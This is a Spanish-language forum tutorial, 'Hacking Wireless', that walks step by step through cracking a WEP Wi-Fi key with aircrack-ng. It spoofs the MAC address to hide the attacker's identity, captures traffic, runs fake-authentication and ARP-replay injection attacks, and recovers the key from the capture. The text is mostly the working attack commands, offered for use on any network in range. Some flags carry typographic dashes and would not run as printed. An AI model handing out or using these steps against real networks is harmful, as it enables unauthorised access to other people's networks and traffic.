[Tutorial] Hacking Wireless [Suite de Aircrack-ng]
Ataque 1 + 3
By $ad
Ataque 1 + 3
By $ad
1-En el menú principal>>>wifislax>>herramientas wireless>> macchanger y escriben cualquier MAC : 00:11:22:33:44:55(para cambiar la dirección MAC del dispositivo de red y asi ocultar la dirección MAC real de la targeta de red)
1.1- Para comprobar el nombre que recibe su interfaz, utilizan el comando:
ifconfig
2-Abrimos una shell, y escribimos esto:
airodump-ng wlan0
(Con este comando vemos las redes que estan dentro del rango de la señal, con su MAC (bssid), canal (ch) y nombre (essid) (Donde Wlan el nombre de mi interfaz de red, vos poned la que les corresponda)
3-Abrimos una shell, y escribimos esto:
airmon-ng start wlan0 3
(Ahora tendremos nuestra tarjeta de red en modo monitor, para poder monitorear las redes del canal 3 (#CH)(En mi caso puse el canal 3 porque era el que mas "data" difundia debido a la señal que era menos debil que las demas, vos poned el que les corresponda al igual que con el nombre de la interfaz de red)
Nota: Debe aparecer un mensaje indicando (No exastamente el mismo, debido a que varia por la interfaz de red):
Interface Chipset Driver
wlan0 RTL8187 r8187 (monitor mode enabled)(Aquí el modelo de la tarjeta de red)
Nota: Cerramos consola y abrimos una nueva.
4- Una vez abierta la nueva shell, escribimos esto:
airodump-ng –w SAD –c3 wlan0
Nota: De esta forma empezamos a monitorear las redes del canal 3 (Vos poned que les corresponda).
Nota: SAD es el nombre del archivo de capturas.
Nota: Esta ventana no la cerramos la dejamos asi y abrimos una nueva
5-Abrimos una nueva shell, y escribimos esto:
aireplay-ng -1 30 –e NombreESSID –a MACROUTER –h MACNUESTRA wlan0
(Con este comando creamos una asociación entre el router y la PC. Debemos intentar una y otra vez hasta que nos aparezca:
“association sucefull :-)”
6-Abrimos una nueva shell, y escribimos esto:
aireplay-ng -3 –x600 –b MACROUTER –h MACNUESTRA wlan0
(Con esto comenzamos a leer y enviar y recibir paquetes)
7-Abrimos una nueva shell , y escribimos esto:
aircrack-ng SAD.cap
Solo queda esperar a que aircrack desencripte el archivo de captura, con nombre SAD y extensión, .cap.
Nota: Importante el nº de Data que se dispongan para poder llevar a cabo la Auditoría Wireless. Para Pass por defecto de 7 a 20 es posible, de lo contrario si la pass se encuentra modificada, a partir de 60.000 datas es aconsejable.